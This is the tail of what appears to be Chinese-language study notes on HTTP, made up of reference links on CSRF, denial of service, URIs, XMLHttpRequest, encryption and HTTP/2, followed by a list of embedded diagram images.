- [维基百科:跨站点请求伪造](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0)
- [维基百科:拒绝服务攻击](https://zh.wikipedia.org/wiki/%E9%98%BB%E6%96%B7%E6%9C%8D%E5%8B%99%E6%94%BB%E6%93%8A)
- [What is the difference between a URI, a URL and a URN?](https://stackoverflow.com/questions/176264/what-is-the-difference-between-a-uri-a-url-and-a-urn)
- [XMLHttpRequest](https://developer.mozilla.org/zh-CN/docs/Web/API/XMLHttpRequest)
- [XMLHttpRequest (XHR) Uses Multiple Packets for HTTP POST?](https://blog.josephscott.org/2009/08/27/xmlhttprequest-xhr-uses-multiple-packets-for-http-post/)
- [Symmetric vs. Asymmetric Encryption  What are differences?](https://www.ssl2buy.com/wiki/symmetric-vs-asymmetric-encryption-what-are-differences)
- [Web 性能优化与 HTTP/2](https://www.kancloud.cn/digest/web-performance-http2)
- [HTTP/2 简介](https://developers.google.com/web/fundamentals/performance/http2/?hl=zh-cn)
---bottom---CyC---
![](index_files/f716427a-94f2-4875-9c86-98793cf5dcc3.jpg)
![](index_files/HTTP_RequestMessageExample.png)
![](index_files/HTTP_ResponseMessageExample.png)
![](index_files/dc00f70e-c5c8-4d20-baf1-2d70014a97e3.jpg)
![](index_files/HTTP1_x_Connections.png)
![](index_files/a314bb79-5b18-4e63-a976-3448bffa6f1b.png)
![](index_files/2d09a847-b854-439c-9198-b29c65810944.png)
![](index_files/ssl-offloading.jpg)
![](index_files/7fffa4b8-b36d-471f-ad0c-a88ee763bb76.png)
![](index_files/39ccb299-ee99-4dd1-b8b4-2f9ec9495cb4.png)
![](index_files/How-HTTPS-Works.png)
![](index_files/2017-06-11-ca.png)
![](index_files/86e6a91d-a285-447a-9345-c5484b8d0c47.png)
![](index_files/af198da1-2480-4043-b07f-a3b91a88b815.png)
![](index_files/e3f1657c-80fc-4dfa-9643-bf51abd201c6.png)
![](index_files/_u4E0B_u8F7D.png)